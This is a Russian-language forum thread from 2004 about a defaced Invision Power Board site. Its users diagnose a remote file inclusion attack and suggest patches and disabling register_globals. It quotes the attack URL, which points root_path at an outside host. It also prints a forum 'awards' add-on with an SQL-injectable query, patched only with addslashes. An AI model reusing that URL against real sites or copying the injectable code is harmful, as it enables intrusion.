Diam Опубликовано 6 Января 2004 Жалоба Поделиться Опубликовано 6 Января 2004 Вчера на титульной моего сайта я увидел приятное сообщение,что сайт взломан... Но я перезалил титульную и все вроде было нормально - кроме титульной ничего не тронули. Форум тоже работал. Сегодня, пытаясь зайти на форум, я увидел такую ошибку:CGI script errorОшибка исполнения CGI приложенияРусское описание Владелец директории с CGI приложением не совпадает с владельцем самого CGI приложения. --------------------------------------------------------------------------------English description CGI uid/gid (2949/0) mismatch directory uid/gid (2949/200) Зашел по FTP - index.php был другим. Я перезалил его резервной копией, но ошибка так и выдается... Что делать? (Служба техподдержки спит) P.S.Да, и не смотря на все это - с наступающим Вас Рождеством! Ссылка на комментарий Поделиться на других сайтах Прочее
0 GiV Опубликовано 6 Января 2004 Жалоба Поделиться Опубликовано 6 Января 2004 Проблема на уровне настроек сервера. Ждать тебе техподдержку видимо. Ссылка на комментарий Поделиться на других сайтах Прочее
0 Valera Опубликовано 6 Января 2004 Жалоба Поделиться Опубликовано 6 Января 2004 Кто хостер? Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 7 Января 2004 Автор Жалоба Поделиться Опубликовано 7 Января 2004 Взломали меня вот так:"http://www.****.***/inv/sources/Admin/ad_member.php?IN=doform&root_path=http://ssteam.by.ru/"Значит дырка в [b]ad_member.php[/b] Заплатка есть? Ссылка на комментарий Поделиться на других сайтах Прочее
0 theIggs Опубликовано 7 Января 2004 Жалоба Поделиться Опубликовано 7 Января 2004 Лучше поставить версию поновее. Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 7 Января 2004 Автор Жалоба Поделиться Опубликовано 7 Января 2004 Много хаков стоит - жалко но, видимо, надо Ссылка на комментарий Поделиться на других сайтах Прочее
0 fixxxer1 Опубликовано 7 Января 2004 Жалоба Поделиться Опубликовано 7 Января 2004 судя повсему - достаточно пропатчить ad_member.php function ad_forums() { global $IN, $root_path, $INFO, $DB, $SKIN, $ADMIN, $std, $MEMBER, $GROUP, $ibforums; if (isset($_REQUEST['root_path'])) die('Hack attempt!'); switch($IN['code']) Ссылка на комментарий Поделиться на других сайтах Прочее
0 fixxxer1 Опубликовано 7 Января 2004 Жалоба Поделиться Опубликовано 7 Января 2004 А еще лучше просто отключить нафиг register_globals (и кто тебя надоумил их включить блин? у любого вменяемого хостера они выключены по умолчанию) Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 7 Января 2004 Автор Жалоба Поделиться Опубликовано 7 Января 2004 fixxxer1 а как их отключить? можно поподробнее - для чайника Ссылка на комментарий Поделиться на других сайтах Прочее
0 fixxxer1 Опубликовано 12 Января 2004 Жалоба Поделиться Опубликовано 12 Января 2004 в .htaccess напишиphp_flag register_globals off а в принципе моего патча достаточно. Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 17 Января 2004 Автор Жалоба Поделиться Опубликовано 17 Января 2004 fixxxer1 когда я такое пишу в .htaccess выдается ошибка 500 Что с этим сделать можно? Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 17 Января 2004 Автор Жалоба Поделиться Опубликовано 17 Января 2004 как сделать register_globals off разобрался (в php.ini) Ссылка на комментарий Поделиться на других сайтах Прочее
0 Valera Опубликовано 18 Января 2004 Жалоба Поделиться Опубликовано 18 Января 2004 .htaccessможно закинуть <files ~ "*.*"> deny from all </files>=============глобальные переменные отключаются в php.ini Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 18 Января 2004 Автор Жалоба Поделиться Опубликовано 18 Января 2004 Valera cпасибо, с этим уже разобрался,но после отключения глобальных переменных все работает,кроме хака наград... awards.php как то не так обращается к базе - не может получить инфу,если php.ini удалить - все работает... если бы кто подсказал ... Ссылка на комментарий Поделиться на других сайтах Прочее
0 Valera Опубликовано 18 Января 2004 Жалоба Поделиться Опубликовано 18 Января 2004 CGI script error Ошибка исполнения CGI приложения Русское описание Владелец директории с CGI приложением не совпадает с владельцем самого CGI приложения. -------------------------------------------------------------------------------- English description CGI uid/gid (2949/0) mismatch directory uid/gid (2949/200) Зашел по FTP - index.php был другим. Я перезалил его резервной копией, но ошибка так и выдается...Дай атрибуты файлу 644, может тебя ломанули соседи по хостингу? Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 18 Января 2004 Автор Жалоба Поделиться Опубликовано 18 Января 2004 Valera а по Хаку Наград не подскажешь? <?php require "../conf_global.php"; $nawards = ""; $INFO['sql_driver'] = !$INFO['sql_driver'] ? 'mySQL' : $INFO['sql_driver']; $to_require = "../sources/Drivers/".$INFO['sql_driver'].".php"; require ($to_require); $DB = new db_driver; $DB->obj['sql_database'] = $INFO['sql_database']; $DB->obj['sql_user'] = $INFO['sql_user']; $DB->obj['sql_pass'] = $INFO['sql_pass']; $DB->obj['sql_host'] = $INFO['sql_host']; $DB->obj['sql_tbl_prefix'] = $INFO['sql_tbl_prefix']; // Get a DB connection $DB->connect(); if (isset($mid)) { $query=$DB->query("select * from invdawards where mid = '$mid'"); $nawards=mysql_num_rows($query); $userinfo=mysql_query("select * from invdmembers where id = '$mid'"); } ?> Почему при register_globals off не получается соединится с базой(пишет, что нет наград, хотя они есть на самом деле)?(если глобальные переменные включить, то все работает) Ссылка на комментарий Поделиться на других сайтах Прочее
0 fixxxer1 Опубликовано 18 Января 2004 Жалоба Поделиться Опубликовано 18 Января 2004 Хак кривой. Перед if (isset($mid)) { напиши $mid = isset($_GET['mid']) ? $_GET['mid'] : 0; PS. Кстати, этот "хак" в том виде, в котором он приведен - одна большая дырка. Для безопасности, еще после этой строки, которую я привел, добавь: if (!get_magic_quotes_gpc()) $mid = addslashes($mid); Добавлено в [mergetime]1074437622[/mergetime] А на хостинге у тебя, похоже, php установлен как CGI. Не очень, значит, хороший хостинг Ссылка на комментарий Поделиться на других сайтах Прочее
0 Diam Опубликовано 18 Января 2004 Автор Жалоба Поделиться Опубликовано 18 Января 2004 Не очень, значит, хороший хостингЯ уже знаю это И СПАСИБО! Все теперь работает! Ссылка на комментарий Поделиться на других сайтах Прочее
Вопрос
Diam
Вчера на титульной моего сайта я увидел приятное сообщение,
что сайт взломан... Но я перезалил титульную и все вроде было нормально - кроме титульной ничего не тронули. Форум тоже работал.
Сегодня, пытаясь зайти на форум, я увидел такую ошибку:
CGI script error
Ошибка исполнения CGI приложения
Русское описание
Владелец директории с CGI приложением не совпадает с владельцем самого CGI приложения.
--------------------------------------------------------------------------------
English description
CGI uid/gid (2949/0) mismatch directory uid/gid (2949/200)
Зашел по FTP - index.php был другим. Я перезалил его резервной копией, но ошибка так и выдается...
Что делать? (Служба техподдержки спит)
P.S.
Да, и не смотря на все это -
с наступающим Вас Рождеством!
Ссылка на комментарий
Поделиться на других сайтах
17 ответов на этот вопрос
Рекомендуемые сообщения